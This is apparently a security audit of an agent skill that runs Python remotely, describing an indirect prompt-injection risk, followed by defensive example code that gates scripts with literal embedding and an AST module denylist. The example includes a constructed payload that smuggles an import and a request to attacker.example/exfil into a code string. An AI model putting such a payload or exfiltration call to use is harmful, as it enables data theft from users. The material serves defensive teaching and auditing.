python-executor
Pass
Audited by Gen Agent Trust Hub on Mar 12, 2026
Risk Level: SAFE
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill uses the 'infsh' command-line interface to execute Python scripts on the inference.sh remote infrastructure. This functionality is the primary intended purpose of the skill.
- [PROMPT_INJECTION]: The skill presents a surface for indirect prompt injection because it accepts a raw 'code' string for execution. An attacker can inject malicious logic if the agent incorporates untrusted external data into this code block without separating that data from the code it generates.
  * Ingestion points: the 'code' field in the input schema defined in 'SKILL.md'.
  * Boundary markers: there are no explicit boundary markers or 'ignore' instructions separating data from code logic.
  * Capability inventory: the execution environment includes full Python capabilities, including network access via 'requests' and 'httpx', browser automation via 'playwright' and 'selenium', and file system access within the 'outputs/' directory.
  * Sanitization: the skill definition does not implement any sanitization or validation of the input code string.
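The finding above comes down to two gaps: no boundary between untrusted data and the code the agent writes, and no check on what that code can reach once it runs. As an added example, not part of this audit, the skill, or the inference.sh tooling, the Python below shows the two controls an agent author would put in front of such an executor: rendering untrusted values into a code template as Python literals so they cannot become statements, and a static `ast` pass that flags the capabilities the audit inventories (network and browser-automation modules, dynamic execution, file paths outside `outputs/`). The module denylist, the `outputs/` prefix and the injection payload are all assumed for illustration.

```python
"""Pre-execution gate for an agent skill that runs arbitrary Python remotely.

Added example (not the audited skill's code). Two controls:
  1. embed_untrusted(): put untrusted data into the script as literals, never
     by string concatenation, so data cannot turn into code.
  2. inspect_code(): statically flag capabilities the executor exposes that
     the task should not need (assumed policy, not the skill's own rules).
"""
import ast
from string import Template

# Assumed policy: modules the audited environment exposes that a gate would
# deny unless the task explicitly needs them.
DENIED_MODULES = {"requests", "httpx", "playwright", "selenium", "subprocess",
                  "socket", "urllib", "shutil", "os", "importlib"}
ALLOWED_PATH_PREFIX = "outputs/"          # the only writable area per the audit
DANGEROUS_CALLS = {"exec", "eval", "compile", "__import__"}


def embed_untrusted(template: str, **data) -> str:
    """Render untrusted values into a code template as Python literals.

    `$name` placeholders in `template` are replaced with repr(value), so a
    payload like  x'\\nimport requests\\n...  stays inside one quoted literal
    instead of becoming new statements. Substituted values are not re-scanned.
    """
    return Template(template).substitute({k: repr(v) for k, v in data.items()})


def _call_name(func: ast.AST):
    """Best-effort name of a called function: open(...) or obj.method(...)."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def _check_open(call: ast.Call) -> list:
    """Flag open() calls whose path is not a literal under outputs/."""
    if not call.args:
        return []
    path = call.args[0]
    if not (isinstance(path, ast.Constant) and isinstance(path.value, str)):
        return [f"line {call.lineno}: open() with non-literal path"]
    if not path.value.startswith(ALLOWED_PATH_PREFIX) or ".." in path.value:
        return [f"line {call.lineno}: file access outside {ALLOWED_PATH_PREFIX}: {path.value!r}"]
    return []


def inspect_code(code: str) -> list:
    """Return policy findings for `code`; an empty list means clear to run."""
    findings = []
    try:
        tree = ast.parse(code)
    except SyntaxError as e:
        return [f"syntax error at line {e.lineno}: {e.msg}"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in DENIED_MODULES:
                    findings.append(f"line {node.lineno}: import of denied module {root!r}")
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in DENIED_MODULES:
                findings.append(f"line {node.lineno}: import from denied module {root!r}")
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in DANGEROUS_CALLS:
                findings.append(f"line {node.lineno}: dynamic execution via {name}()")
            elif name == "open":
                findings.extend(_check_open(node))
    return findings


# Constructed injection payload: a page title the agent scraped and wants to
# drop into a script. It closes the quote and adds its own statements.
PAYLOAD = "x'\nimport requests\nrequests.get('http://attacker.example/exfil')\ny = '"

if __name__ == "__main__":
    naive = f"title = '{PAYLOAD}'\nprint(title)"          # data concatenated as code
    safe = embed_untrusted("title = $title\nprint(title)", title=PAYLOAD)
    print("naive:", inspect_code(naive))                  # flags the smuggled import
    print("safe: ", inspect_code(safe))                   # [] : payload is just a string
```

The static pass is a pre-check, not a sandbox: `getattr(__builtins__, ...)`, `importlib` aliases pulled in indirectly, or code fetched at runtime can all slip past an AST denylist, so it should sit in front of whatever isolation the executor itself provides rather than replace it. The data-embedding step is the stronger of the two controls, because it removes the attacker's ability to change the script's structure at all.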
Audit Metadata